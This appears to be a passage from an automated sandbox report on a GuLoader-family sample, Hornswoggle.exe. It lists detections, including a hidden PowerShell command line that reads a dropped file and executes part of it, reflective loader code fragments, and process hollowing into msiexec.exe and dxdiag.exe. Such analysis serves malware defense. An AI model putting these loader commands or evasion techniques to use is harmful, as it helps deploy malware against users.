    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: justifikationssager.lnk.0.drLNK file: ..\..\..\..\..\Filial195.plo
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Hornswoggle.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: stem.Core.pdbD source: powershell.exe, 00000002.00000002.23289519078.0000000008B80000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.23291511273.0000000009400000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000002.00000002.23291877014.000000000C190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Found suspicious powershell code related to unpacking or dynamic code loading
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Millionvises $Slumberproof $Konfiskabel), (Marred @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Kontorsystemernes = [AppDomain]::CurrentDomain.GetAssembl
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Shortpassings)), $Elisabeth).DefineDynamicModule($Lodowick110, $false).DefineType($Rakkerkulers, $Begribeliges, [System.MulticastDeleg
    Suspicious powershell command line found
    Source: C:\Users\user\Desktop\Hornswoggle.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) "
    Source: C:\Users\user\Desktop\Hornswoggle.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) "Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04FBA3B8 push eax; mov dword ptr [esp], edx2_2_04FBA3CC
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07AD4E03 push eax; retf 2_2_07AD4E19
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07AD0CB9 push eax; ret 2_2_07AD0CCE
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_098134D0 push 8BD38B50h; iretd 2_2_098134D6
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0984559D push edi; iretd 2_2_098455B2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09844DF2 push edx; iretd 2_2_09844DF4
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09842110 push esi; ret 2_2_09842156
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09843B38 push D7802852h; retf 2_2_09843B3D
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0984394A push dword ptr [edx]; retf 2_2_09843979
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09842356 push cs; retf 2_2_0984235D
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_098432B3 push ebp; iretd 2_2_098432CB
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09843ECF push esi; iretd 2_2_09843EDB
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0984485E pushad ; iretd 2_2_0984486A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09841667 push ss; retf 2_2_0984166A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09842273 pushfd ; ret 2_2_09842278
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09844878 pushad ; iretd 2_2_0984486A
    Source: C:\Users\user\Desktop\Hornswoggle.exeFile created: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\nsExec.dllJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9872Jump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\nsExec.dllJump to dropped file
    Source: C:\Users\user\Desktop\Hornswoggle.exeCode function: 0_2_00406167 FindFirstFileA,FindClose,0_2_00406167
    Source: C:\Users\user\Desktop\Hornswoggle.exeCode function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405705
    Source: C:\Users\user\Desktop\Hornswoggle.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
    Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
    Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
    Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: C:\Users\user\Desktop\Hornswoggle.exeAPI call chain: ExitProcess graph end nodegraph_0-3488
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04ACD6F8 LdrInitializeThunk,2_2_04ACD6F8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Sample uses process hollowing technique
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
